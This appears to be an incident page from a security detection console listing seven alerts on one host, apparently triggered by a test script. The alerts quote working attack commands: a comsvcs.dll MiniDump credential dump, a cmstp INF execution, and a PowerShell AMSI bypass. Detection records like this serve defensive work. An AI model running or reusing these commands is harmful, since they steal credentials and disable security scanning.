Back to list
Critical CINC-20251220-E4A0D871 new
Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8598451505
Incident Overview
Incident ID
CINC-20251220-E4A0D871
Severity
Critical (90)
Status
new
Alert Count
7
Host Count
1
Timeline
First Seen
2025-12-18 08:34:45
Last Seen
2025-12-18 08:36:05
Duration
0d 0h 1m
Created
2025-12-20 13:23
Updated
2026-01-13 15:14
Kill Chain Analysis
Rec...
Ini...
Exe...
Per...
Pri...
Def...
Cre...
Dis...
Lat...
Col...
Com...
Exf...
Imp...
Observed Tactics:
Techniques:
Affected Hosts (1)
Related Alerts (7)
| Severity | Status | Hostname | Description | Tactic | Command Line | Time |
|---|---|---|---|---|---|---|
| Critical | new | TEAHEE | Credential Access | rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full | 12-18 08:36 | |
| High | new | TEAHEE | Defense Evasion | rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full | 12-18 08:36 | |
| High | new | TEAHEE | Defense Evasion | C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full" | 12-18 08:36 | |
| High | new | TEAHEE | Defense Evasion | cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf | 12-18 08:36 | |
| High | new | TEAHEE | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-18 08:35 | |
| High | new | TEAHEE | Execution | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-18 08:35 | |
| Informational | new | TEAHEE | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-18 08:34 |